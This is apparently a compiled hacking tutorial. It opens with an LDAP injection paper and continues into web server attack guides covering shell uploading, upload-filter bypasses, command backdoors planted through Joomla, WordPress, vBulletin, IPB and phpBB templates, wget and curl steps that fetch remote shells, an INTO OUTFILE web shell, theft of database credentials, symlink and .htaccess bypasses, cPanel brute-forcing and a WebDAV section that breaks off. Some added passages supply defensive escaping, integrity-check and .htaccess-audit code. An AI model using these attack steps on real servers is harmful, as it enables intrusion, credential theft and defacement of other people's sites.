LDAP injections :

---[ 0x01: Introduction ]

LDAP (Lightweight Directory Access Protocol) is a lightweight protocol for accessing X.500 directory services. It runs over TCP/IP and is used to query and modify the objects stored in the directory.

---[ 0x02: LDAP filters ]

It is quite important to understand how LDAP filters work. The grammar is defined in RFC 4515 (June 2006), http://tools.ietf.org/html/rfc4515:

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = | filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = "=" / "~=" / ">=" / "<="
Present = attr = *
Substring = attr "=" [initial] * [final]
Initial = assertionvalue
Final = assertionvalue

Logical operators:
- AND "&"
- OR "|"
- NOT "!"

Relational operators: <=, >=, =, ~=

The wildcard "*" stands in for any run of characters.

Filter example: (&(objectClass=user)(uid=*)) returns a list of all objects of type user, whatever the value of their "uid" attribute.

---[ 0x03: LDAP injection in Web Applications ]

LDAP injection is very similar to SQL injection. The technique targets websites that build LDAP statements directly from data supplied by the user.

Vulnerable code with comments (by Sacha Faust):

+++++++++++++++++++++++++++++++++++++
line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4: Dim userName
line 5: Dim filter
line 6: Dim ldapObj
line 7:
line 8: Const LDAP_SERVER = "ldap.example"
line 9:
line 10: userName = Request.QueryString("user")
line 11:
line 12: if( userName = "" ) then
line 13: Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
line 14: Response.End()
line 15: end if
line 16:
line 17:
line 18: filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
line 19:
line 20:
line 21: 'Creating the LDAP object and setting the base dn
line 22: Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
line 23: ldapObj.ServerName = LDAP_SERVER
line 24: ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26: 'Setting the search filter
line 27: ldapObj.SearchFilter = filter
line 28:
line 29: ldapObj.Search
line 30:
line 31: 'Showing the user information
line 32: While ldapObj.NextResult = 1
line 33: Response.Write("<p>")
line 34:
line 35: Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>")
line 36: For i = 0 To ldapObj.AttrCount -1
line 37: Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38: Next
line 39: Response.Write("</p>")
line 40: Wend
line 41: %>
line 42: </body>
line 43: </html>
+++++++++++++++++++++++++++++++++++++

In line 10 the userName variable is initialised with the value of the "user" parameter and then quickly validated to check whether it is empty. If it is not empty, userName is used on line 18 to build the filter variable. That variable is used directly as the LDAP search filter passed to SearchFilter on line 27, so the attacker has full control over what is queried on the LDAP server. When the code reaches lines 32 to 40, all results and their attributes are displayed to the user.

Example 1:
http://website/ldap.asp?user=*
Here the character "*" is sent in the "user" parameter and ends up in the filter variable. This LDAP statement matches any object that has a uid attribute, so all users and their information are shown.

Example 2:
http://website/ldap.asp?user=ka0x)(|(homedirectory=*)
This shows us the path to the home directory of the user ka0x.

You can test this with the code above before moving on.

---[ 0x04: Links ]
http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol
http://es.wikipedia.org/wiki/LDAP
http://www.ldapman.org/

__EOF__
# milw0rm.com [2007-11-04]
© Offensive Security 2011
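What line 18 is missing is the escaping RFC 4515 section 3 requires for an assertion value. The following is an added example, not part of the milw0rm paper or of this compilation: it puts the raw concatenation next to an escaped version, and adds a structural check that accepts only a single (uid=value) item, usable before the Search call or as a rule over LDAP server logs. The user names are constructed and the function names are my own.

```python
import re

# Added example: RFC 4515 escaping for assertion values, beside the raw
# concatenation from line 18 of the ASP sample. Inputs are constructed.

# RFC 4515 section 3: these characters must be written as \XX hex pairs.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape a string for use as an LDAP assertion value. Backslash is in
    the table like every other character, so nothing is escaped twice."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_vulnerable(user_name: str) -> str:
    # Equivalent of: filter = "(uid=" + CStr(userName) + ")"
    return "(uid=" + user_name + ")"


def build_filter_safe(user_name: str) -> str:
    return "(uid=" + escape_filter_value(user_name) + ")"


# Exactly one equality item on uid: inside the value only plain characters
# (no ( ) * \ ) or escaped \XX pairs are allowed, then the closing paren.
_SINGLE_UID_ITEM = re.compile(r"\(uid=(?:[^()*\\]|\\[0-9a-fA-F]{2})*\)")


def is_single_uid_equality(filter_text: str) -> bool:
    """Structural guard: True only if the whole filter is one (uid=value)
    item. A wildcard, an extra item or a logical operator fails it."""
    return _SINGLE_UID_ITEM.fullmatch(filter_text) is not None


if __name__ == "__main__":
    for user in ["alice", "*", "ka0x)(|(homedirectory=*)"]:
        for label, build in (("vulnerable", build_filter_vulnerable),
                             ("safe", build_filter_safe)):
            f = build(user)
            print(f"{label:10} {f:45} single uid item: {is_single_uid_equality(f)}")
```

Escaping alone is enough to turn both examples above into literal searches for a user whose name contains "*" or ")(": the wildcard becomes \2a and the parentheses \28 and \29, so the filter still has exactly one item. The structural check is the belt to that pair of braces; it also catches the case where a developer forgot to call the escape.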
Part 2
Web server Hacking

Using the above vulnerabilities, various types of hacks can be used to hack a web server.

Guide content:
 Shell Uploading Guide
 Shell uploading through php-my-admin
 Shell Jumping
 Symlink Bypass 2013 for Linux Servers
 Hack Web-DAV & Deface
 Root server without local root exploit
 LINUX SERVER ROOTING Tutorial
 Cpanel Cracking
 Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error
 Backdoor a WEB SERVERS WITH WEBACOO
 Web Server Hacking through Command Injection
 How To Hack Windows Servers Using Dubrute 2.2
 Symlink Tutorial for beginners
 MASS DEFACE TUTORIAL
 How to hack a websites using Symlink Bypassing
 ATTACKING WEBSERVERS VIA .HTACCESS
 How to Back-connect with netcat
 Hacking Cold Fusion Servers - Part I
 Hacking Cold Fusion Servers - Part II

So let's get started !

1. Shell Uploading Guide

Many newbies face problems uploading a shell to a site after getting admin access / logging in to that site, so I am writing this to help them. Basically a shell gives us remote access to that server. Such shells are available in different languages like php, asp/aspx, cgi etc., so we have to choose a shell that will work on the server according to the server script: if the server supports php then choose any of the php shells, otherwise asp or cgi.

Now, let's come to the main point. After logging in to the site, if we find any upload option in the site, then we can easily upload a shell. But sometimes we have to make some changes to upload a shell.

Way 1
As the shell is in php format, some sites do not allow uploading such scripts directly with the php extension. If so, just rename the shell: add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the shell name was shell.php, then rename it to shell.php.jpg or anything else.

Way 2
Upload a simple uploader shell first that isn't detected by antivirus and firewalls, then upload your shell through your own shell. You can download an uploader shell from here.
Way 3
A few server firewalls detect the shell script by checking the headers and don't allow us to upload a shell, so we can bypass them using the "GIF89a shell script bypass" method. Open your shell in notepad and add "GIF89a;" (without quotes) before the shell code starts, like below:

GIF89a;

Depending on what kind of file validation they use, this may fool the server into thinking it's an image: when it reads the file it finds the gif header and assumes it's safe because it's an image.

Way 4
This method is more advanced. It only works against client-side filters rather than server-side ones. Download Firebug for Firefox, then edit the html of the upload form:

<form enctype="multipart/form-data" action="uploader.php" method="POST">
Upload DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br />
<input type="submit" value="Upload File" />
</form>

Change the accept filter to *.* or just remove it completely; it will then let you upload any type of file.

Way 5
First download the "Live HTTP Headers" addon for your Firefox browser.
1. Rename your shell to shell.php.jpg (or whatever that site supports. In my case the site supports only jpg files, that's why I renamed it to shell.php.jpg.)
2. Open Firefox, start the Live HTTP Headers addon, and then upload your shell.
3. Your Live HTTP Headers window will then look something similar to this
4. Click on shell.php.jpg, then click the Replay button.
5. A new window will open with two boxes; we have to work on the second box.
6. In the second box, rename shell.php.jpg to shell.php, then click the Replay button again.

Way 6
Find yourself a copy of edjpgcom.exe. "edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file."
Usage:
edjpgcom "filename.jpg"
Now add this to the jpg comment, since you won't be able to drop a whole shell in there due to size limits etc.:
"; system($_GET['cmd']); echo ?>
Now rename your jpg to .php and upload.

Way 7
Another way to fool the web server into thinking you're uploading an image instead of a php shell is to get Firefox, install the "tamperdata" addon, click Start Tamper, upload your php shell, then tamper the data and change the Content-Type from 'application/octet-stream' to 'image/jpeg'. If you have any problem uploading a shell using tamperdata, just do a simple Google search; many video tutorials on this are available on the web, so I am not explaining it step by step.
Way 8
All the above mentioned ways work when we find an upload button on the site. When there is no upload button it's not easy to upload a shell there, but we can try a few things. We have to find out whether there is an edit option for an existing php/asp/aspx page. If there is, open that page and delete the whole script. After that open your shell in notepad, copy the script, paste it into that page and save it. Now that link will be your shell. We can possibly find an edit option in the following pages of a site:
Contact us.php / Contact us.asp
Class.php / Class.asp
About us.php / about us.asp
Terms.php / terms.asp
NB: some news, vehicle selling, cart etc. sites don't have any option to upload a file after logging in through the admin panel. They only allow file upload after logging in through cPanel.

Way 9
Sometimes, on some remote file inclusion vulnerable sites, we have to execute a shell from another hosting site.
Method:
1) Upload your shell to a free hosting site like www.my3gb.com, www.3owl.com, www.ripway.com, www.000webhost.com, etc.
2) Now suppose your shell link is www.example.my3gb.com/c99.txt and your vulnerable site is www.site.com
3) Now we have to execute the following command to gain shell access to that site:
http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4) Replace the site link in the command according to your shell and vulnerable site link.

SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES
In the above mentioned sites we generally can't find a direct upload option, so we have to do it in other ways.

1. Joomla site: After logging in to the admin panel you will find Extensions as the 5th item. Expand it and click Template Manager > check any template (like beez, ja_purity). Now click Edit (upper right side), then click Edit HTML, paste your shell code and click Save. Done. The shell is at site.com/templates/template name/index.php, e.g. site.com/templates/beez/index.php

2. Wordpress: log in to the admin panel, expand Appearance then click Editor > you will find style.css; now select 404.php on the right side, paste your shell code and click edit file. You can find the shell at site.com/wp-content/themes/theme name you edited/404.php
3. Vbulletin:
1- Log in to admincp
2- Under "Plugins & Products", select Add New Plugin
3- Adjust the settings as follows:
Product: vBulletin
Hook Location: global_start
Title: (Anything ...)
Execution Order: 5
Code:
ob_start();
system($_GET['cmd']);
$execcode = ob_get_contents();
ob_end_clean();
Plugin is Active : Yes
4- After the plugin is added, go to the heading "Style and Design" and select "Style Manager"
5- Under whatever the default style is in the dropdown menu, select Edit Templates.
6- Scroll to the ForumHome templates and expand them. Click [Customize] beside FORUMHOME.
7- Search for the code $header somewhere near the top. Replace it with:
$header
$execcode
8- Now go to the forum and add after index.php:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php
So it looks like:
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php
What this does is download shell.txt and rename it to shell.php. Now the shell should be at shell.php in the forum directory. If not, wget is disabled on that server and you can try alternative methods:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php

4. SMF: log in to the admin panel. You need to download any SMF theme in zip format, put your shell.php in it and save. Admin panel > select Themes and Layout > Install a new theme > browse and upload the theme that has our shell.php :) After upload the shell will be at site.com/Themes/theme name/shell.php

5. IPB: log in to the admin panel > Look and Feel > Manage Languages, choose a language > section (example) public_help, edit: help.txt. Choose a topic from the list, or search for a topic. In the right box add the code below:
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}}
${${system($query,$out)}}
${${print $out}}
When you have added it, click Go at the bottom. Now we go to http://www.site.com/index.php?app=core&module=help and the code we added will run, and you will get your shell at www.site.com/cache/shell.php

6. phpBB: log in to the admin panel > go to Styles -> Templates -> Edit, for Template file choose faq_body.html. At the bottom of it, add:
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
and save it. Now go to:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt
The shell is found in site path/shell.php

Mybb forum: log in to admincp > go to Templates and Styles, find what the default MyBB theme is. Then go to Templates, expand the templates that are used by the current theme. Find Calendar templates, click it. Click 'calendar'. Above all the html code, paste this: http://pastebin.com/nA3asuNz and save :) The shell will be found at site.com/calendar.php
Note: if you get an error like "code is danger unable to edit" then simply paste your deface code to deface calendar.php
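Every CMS method above, from the Joomla template edit to the MyBB calendar template, ends the same way: a theme or template file under the web root changes, or a new .php file appears in a directory that should only hold static content. The following is an added example, not code from this guide, of the file-integrity baseline that makes those changes visible: hash every file under the web root, store the baseline outside it, and report what was added, removed or modified on the next run. The site layout in demo() is constructed to replay the Wordpress 404.php edit and the IPB cache/shell.php drop.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Added example: a file-integrity baseline for the theme, template and cache
# directories the CMS sections above edit. The site layout in demo() is
# constructed.


def hash_file(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root) -> dict:
    """Relative POSIX path -> sha256 for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hash_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def save_baseline(snap: dict, path) -> None:
    # Keep the baseline outside the web root, or it is the first thing edited.
    Path(path).write_text(json.dumps(snap, indent=1, sort_keys=True))


def load_baseline(path) -> dict:
    return json.loads(Path(path).read_text())


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Added / removed / modified paths. In a web root, anything 'added'
    ending in .php and anything 'modified' under a theme directory is
    worth looking at straight away."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in common if baseline[k] != current[k]),
    }


def demo() -> dict:
    """Build a small site, baseline it, then replay the edits described
    above: the theme's 404.php rewritten and a new file dropped in cache/."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp) / "public_html"
        (site / "wp-content/themes/beez").mkdir(parents=True)
        (site / "cache").mkdir()
        (site / "wp-content/themes/beez/404.php").write_text("<?php get_header(); ?>")
        (site / "wp-content/themes/beez/style.css").write_text("body{}")
        (site / "index.php").write_text("<?php require 'wp-blog-header.php'; ?>")
        baseline_file = Path(tmp) / "baseline.json"   # outside the web root
        save_baseline(snapshot(site), baseline_file)
        # ... later: the edits from the tutorial happen
        (site / "wp-content/themes/beez/404.php").write_text("<?php /* modified */ ?>")
        (site / "cache/shell.php").write_text("<?php /* dropped file */ ?>")
        return diff_snapshots(load_baseline(baseline_file), snapshot(site))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run the snapshot from cron and alert on a non-empty diff; legitimate theme updates show up too, which is the point: each one should match a change someone can account for. The vBulletin plugin and the phpBB template edits are stored in the database rather than on disk, so for those the equivalent baseline is a periodic dump of the plugin and template tables compared the same way.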
Tutorial: shell uploading through phpmyadmin

Requirements:
- You must have the full path
- pma & mysql db privileges.

It's not every day you get to use this, it's rare, but today I exploited a site this way so I thought of writing a tutorial. OK then, let's start.

First log in to mysql, then click 'Show MySQL system variables', then 'SQL'. Now you can run sql commands, like create db, delete tables or whatever. We want to upload a shell, so let's move on to it. We will write a cmd line into a new file with SELECT ... INTO OUTFILE:

SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "full/path/here/cmd.php"

and click 'Go'. Now the cmd line is at http://site.com/cmd.php. Let's run the command to get the shell:

wget http://www.r57.biz/r57.txt;mv r57.txt shell.php

And that's it, we have a shell on the server xD

Note: INTO OUTFILE needs the MySQL FILE privilege, and when secure_file_priv is set the server only writes into that one directory, so a write into the web root like the one above fails. Not granting FILE to the application's database account, together with that setting, is what stops this method.
Shell Jumping

Requirement : shell b374k (click on the link and you will get a php file; just right-click and select Save, or press Ctrl+S on the keyboard, and save it under any name like hacker.php, myshell.php or darksite.php)

Follow these steps
 After uploading the shell, click on Local Domain to view all websites hosted on the same server. Check which ones are readable.
 Now choose any website from the Local host domain list and copy its Senarai User value, then go to Home and paste it into the view file/folder path after home/replacethiskeyword/public_html/. For example, if the current view file/folder value is home/abc/public_html and your target website's Senarai User value (username) is xyz, then the view file/folder value will be home/xyz/public_html/
 After going to that folder, look for the MySQL config (wp-config.php in Wordpress and configuration.php for Joomla). Open the file and you'll get the database username and password. It will look like:
Username =
/** MySQL database username */
define('DB_USER', 'googlyma_wrdp1');
PASSWORD =
/** MySQL database password */
define('DB_PASSWORD', 'PHZ2hum6{{KE');
 Now connect to the MySQL database with the username and password and run this SQL query:
UPDATE wp_users SET user_pass = md5('123456') WHERE user_login = 'admin';
 Now what we have done: go to http://website.com/wp-admin/ and log in with username admin and password 123456. And you have successfully done it.
Symlink Bypass 2013 for Linux Servers

Note : This method is not applicable to Godaddy, Bluehost, Hostgator and Hostmonster servers.

For this you first need the following files :
 Sen Haxor CGI Shell
 sen.zip
 passwd-bypass.php
 Turbo Brute force Cpanel
 Port.py

Before starting to symlink we need to create php.ini and ini.php to disable safe mode and disabled functions on the server. Use the following code.

Make a php.ini with the following code:

safe_mode=Off

And ini.php with:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

So after creating php.ini and ini.php, upload the other files to the server.

BYPASSING SYMLINK ON PLESK, DEBIAN, CENTOS & REDHAT SERVERS

Now I will explain how to bypass symlink on Plesk, Debian, Centos and Redhat. Commonly all of the above have a root path like /root/var/www/vhost/ where all sites are under the vhost directory. But you won't have permission to view it, so we will create a symbolic link to root, view the site and symlink the config files.

Make a new directory in your shell, for example sen, then upload sen.zip. Then use this command to unzip the file and create a symbolic link to root.

Command : unzip sen.zip

Note : On some servers the unzip command won't work, so you can manually create a symlink to root with the command

ln -s / root

Then you will see this:

$ unzip sen.zip
Archive: sen.zip
linking: sen.txt -> /
finishing deferred symbolic links:
sen.txt -> /

This means a symbolic link has been created to / (root).

Now we need to upload a .htaccess; use the following:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php

Done, bypassed. Now view /var/www/vhost/ and you will be shown all sites.

BYPASSING SYMLINK ON APACHE AND LITESPEED

Mostly when you try to symlink an Apache 2013 server you will face 403 Forbidden, 404 Not Found or 500 Internal Server Error. These can be bypassed by using different .htaccess files individually.

BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers

First make a new directory in your shell, for example sen, then upload sen.sa and .htaccess from the Sen Haxor CGI shell (download link at the end of the tutorial). After uploading .htaccess and sen.sa to the new directory sen, chmod sen.sa to 0755. Then open the CGI shell and log in (password : senhaxor).

Now there are several methods to bypass 403 Forbidden. You need to try all of the following methods; at least one will succeed.

Method 1 : .shtml method

This is the method most commonly used by hackers to bypass the 403 Forbidden error. Before we proceed you first need to get /etc/passwd from the server so that we can find the usernames and the paths where the sites are located. On 2013 servers many functions are enabled which show 403 Forbidden when you try to read /etc/passwd with cat, so I made a powerful shell which can bypass that and get /etc/passwd from the server. I will also add it to the downloads. Upload the /etc/passwd bypasser shell and get /etc/passwd.

Then log in to the Sen Haxor CGI shell and create a symbolic link to your target:
 Step 1 : ln -s / root
 Step 2 : ln -s /home/username/public_html/config.php 1.shtml

Example: if our site is www.site.com, the username is site and it runs Wordpress:
ln -s /home/site/public_html/wp-config.php 1.shtml

So we created a symbolic link to our target. Now go to your shell and edit the .htaccess with the following code :

Options +FollowSymlinks
DirectoryIndex itti.html
RemoveHandler .php
AddType application/octet-stream .php

Once you have done this, open 1.shtml in your browser, right-click and view source. You will be able to view the config. This is the common way to bypass 403 Forbidden and Litespeed. Now let me explain the advanced method =)

Method 2 : Bypassing Symlinked Config From Cpanel

For this you need at least one cPanel account on the server. I will tell you how to easily crack cPanel. First run this command :

ls /var/mail

You will be shown all usernames on the server. Copy them all. Now upload the Turbo Brute Force Cpanel script (attached with the downloads). Open the script and paste all the usernames into User. For Password, here is the wordlist :

Copy all and paste it into Password, select Simple and click Submit. If you're lucky you will be shown cracked cPanels.

Once you have a cPanel on the server you can bypass the 500 Internal Server Error and 403 Forbidden error from port 2077 and from the error pages in the file manager. Just symlink the config:

ln -s /home/user/public_html/wp-config.php config.shtml

Log in to the cPanel, then go to File Manager -> Error Pages. Then choose any of these according to what error is triggered when you open your symlinked config:
400 (Bad request)
401 (Authorization required)
403 (Forbidden)
404 (Not found)
500 (Internal server error)

Example: where the URL has "&file=400.shtml&desc=(Bad request)", we can get the config with "&file=config.shtml&desc=(Bad request)"

BYPASS SYMLINK FROM PORT 2077

Once you have symlinked the config you can just log in to port 2077, then open public_html/path/config.shtml. You will be able to download config.shtml and view the source.

Method 3 : Symlink Bypass via Open Port using Python

For this Python needs to be installed on the server. To check if Python is installed, run this command:

python -h

If it is installed we can use the following python script to bypass:
#!/usr/bin/env python
# devilzc0de.org(c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123

if __name__ == '__main__':
    os.chdir('/')
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
    httpd = SocketServer.TCPServer(("", port), Handler)
    print("Now open this server on webbrowser at port : " + str(port))
    print("example: http://site.com :" + str(port))
    httpd.serve_forever()

I have added the script to the downloads. Now upload the script to the shell (screenshot: http://foto.pk/images/205cjg3.jpg) and run this command :

python port.py

(screenshot: http://foto.pk/images/2je1wqq.jpg)

Now open the site on port 13123: www.site.com:13123 (screenshot: http://foto.pk/images/j5ifwm.jpg)

Server bypassed from open port.

Method 4 : Bypassing Symlink Using the .ini Method

Log in to the Sen Haxor CGI shell and create a symlink to your target with the .ini extension as normal:
ln -s /home/user/public_html/wp-config.php config.ini
Now go to the shell, make a new file a.shtml, paste the following code inside it and save it:
<!--#include virtual="config.ini"-->
Now open a.shtml in the browser, right-click and view the source. Done, bypassed.

Method 5 : Bypassing Symlink Using a ReadMe file

Make a new directory in your shell. From the CGI shell, symlink the config as normal:
ln -s /home/user/public_html/config.php config.txt
Now make a .htaccess with the following code:
Options All
ReadMeName config.txt
Now when you open the directory in the browser you will be shown the config source directly. E.g. if site.com/sen/config.txt is your symlinked config, then when you open www.site.com/sen/ your symlinked config will be displayed as the ReadMe content.

That's it, I have explained all the methods to bypass symlink. If you still have problems bypassing, try all of the following .htaccess files:

1 -> .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

2 -> .htaccess
Options All
DirectoryIndex ssss.html
addType txt .php
AddHandler txt .php
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

3 -> .htaccess
suPHP_ConfigPath /home/user/public_html/php.ini

4 -> .htaccess
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html

5 -> .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</IfModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

.HTACCESS TO BYPASS DISABLED FUNCTIONS

This one is to make python work:
.htaccess
AddType application/x-httpd-cgi .py
AddHandler cgi-script .py
AddHandler cgi-script .py

This one is to make perl work:
.htaccess
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl

This one is to enable symlinks if the function is disabled on the server:
.htaccess
<Directory "/home">
*** Options -ExecCGI* ***
AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>

This one is to retrieve users' permissions:
.htaccess
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html

Bypass Internal Server error:
.htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Change php version:
.htaccess
AddType application/x-httpd-php4 .php

Bypass upload options and upload a shell with another extension:
<FilesMatch "^.*.mp3">
SetHandler application/x-httpd-php
</FilesMatch>

Retrieve config with the picture method:
.htaccess
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif

DOWNLOAD LINK OF THE SCRIPTS I HAVE USED IN THE TUTORIAL :
www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar

So that's it, I think I have covered everything related to bypassing symlink and disabled functions on a server. If you still face problems with symlink, contact me : www.facebook.com/cheenu.vis

Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro - Godzilla - Architkp - RooT_Devil - Navneeth Singh - Cyberboy India - Cooltoad_ICA - Suriya Prakash - Avinash Mohiti - Ion - Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath - Sksking Decoder - Rafay Bolach - Mike Wals - Team Indishell and all Indian Hackers
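Every .htaccess variant in this section works by re-enabling something a shared host should have left off per directory: FollowSymLinks or Options All, PHP served as text or SSI, a CGI handler on a data extension, mod_security switched off, or a user-supplied php.ini. The following is an added example, not code from the tutorial, of an auditor that flags exactly those directives in .htaccess files collected from a server. The two sample files are copied from the variants above; the hardened one and the rule names are mine.

```python
import re

# Added example: an auditor for the .htaccess directives the symlink-bypass
# section relies on. Sample files: two copied from the page, one constructed.

# Options tokens that each enable one of the bypasses above.
DANGEROUS_OPTIONS = {
    "all": "enables every option below at once",
    "followsymlinks": "follows symlinks into other accounts' files (SymLinksIfOwnerMatch is the safe form)",
    "indexes": "directory listing exposes symlinked files",
    "includes": "server-side includes can pull in any symlinked file",
    "execcgi": "arbitrary CGI execution from the document root",
}

# One rule per non-Options line: (name, regex, why). First match wins.
RULES = [
    ("php-source-disclosure",
     re.compile(r"^(AddType\s+(text/plain|txt|application/octet-stream)\s+\S*\.php\b"
                r"|RemoveHandler\s+\S*\.php\b|AddHandler\s+(server-parsed|txt)\s+\S*\.php\b)", re.I),
     ".php served as text, download or SSI: source of config files is exposed"),
    ("ssi-handler", re.compile(r"^AddHandler\s+server-parsed\b", re.I),
     "server-side includes enabled"),
    ("handler-remap",
     re.compile(r"^(AddHandler\s+cgi-script\b|SetHandler\s+application/x-httpd-php\b"
                r"|AddType\s+application/x-httpd-(cgi|php\d*)\b)", re.I),
     "non-script extension mapped to a script handler"),
    ("modsecurity-off", re.compile(r"^SecFilter(Engine|ScanPOST)\s+Off\b", re.I),
     "mod_security disabled for the directory"),
    ("php-ini-override", re.compile(r"^suPHP_ConfigPath\b", re.I),
     "user-supplied php.ini replaces the server's"),
    ("readme-disclosure", re.compile(r"^ReadMeName\b", re.I),
     "directory listing embeds an arbitrary file as the README"),
    ("allowoverride", re.compile(r"^AllowOverride\b(?!\s+None\b)", re.I),
     "permits further .htaccess overrides"),
]


def audit_line(line: str) -> list:
    """Findings for one directive line as [(rule, why), ...]."""
    findings = []
    m = re.match(r"^Options\s+(.*)$", line, re.I)
    if m:
        for token in m.group(1).split():
            if token.startswith("-"):          # '-Indexes' removes the option
                continue
            name = token.lstrip("+").lower()
            if name in DANGEROUS_OPTIONS:
                findings.append(("options-" + name, DANGEROUS_OPTIONS[name]))
        return findings
    for rule, rx, why in RULES:
        if rx.search(line):
            findings.append((rule, why))
            break
    return findings


def audit_htaccess(text: str) -> list:
    """[(line number, rule, directive)] for every risky directive; blank
    lines, comments and container tags such as <IfModule> are skipped."""
    report = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("<"):
            continue
        for rule, _why in audit_line(line):
            report.append((lineno, rule, line))
    return report


# Copied from variant 1 above.
PAGE_HTACCESS_1 = """Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
"""
# Copied from the "upload shell in another extension" variant above.
PAGE_HTACCESS_MP3 = """<FilesMatch "^.*.mp3">
SetHandler application/x-httpd-php
</FilesMatch>
"""
# Constructed: what a shared-hosting .htaccess can still reasonably do.
HARDENED = """# only same-owner symlinks, no listing, no SSI, no CGI
Options -Indexes -Includes -ExecCGI +SymLinksIfOwnerMatch
DirectoryIndex index.php
"""

if __name__ == "__main__":
    for name, text in (("variant 1", PAGE_HTACCESS_1), ("mp3", PAGE_HTACCESS_MP3), ("hardened", HARDENED)):
        print(name, audit_htaccess(text) or "clean")
```

The auditor only matters where .htaccess is honoured at all. AllowOverride None in the server configuration makes Apache ignore the file entirely, which removes every variant above in one line; where overrides must stay on, restricting AllowOverride to the directive classes the customer needs (and never Options or FileInfo) leaves the symlink and handler directives with nothing to change.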
Hack WebDAV & Deface

Alright guys, today in this tutorial I'll be explaining how to use the WebDAV exploit. The link to the tools used in this tutorial can be found at the bottom.

For those of you who do not know what WebDAV is, here is the definition: Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer users to edit and manage files collaboratively on remote World Wide Web servers. But for our purpose we will be using it to exploit RDPs, or the Remote Desktop Protocol. For a better understanding, these RDPs could range from VPSes to dedicated servers to just plain old home PCs, but no matter what it is, you will gain full access to the machine and can basically do whatever you want using a shell.

For those of you who are new to the hacking scene, a shell is a php script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 and the r57, but in this case we will be using the c99. Please be aware these are not the only shells available; there are several posted throughout the forum and you can find them by simply using the search button on the navbar.

Now, before being able to use the shell we have to find some vulnerable IPs to gain access to. For this we will be using the WebdavLinkCrawler, which can be found in the WebDAV tool kit I have provided below; if you don't trust my download links, simply don't download them, it's that simple. Once you have opened the program you will be presented with this interface.

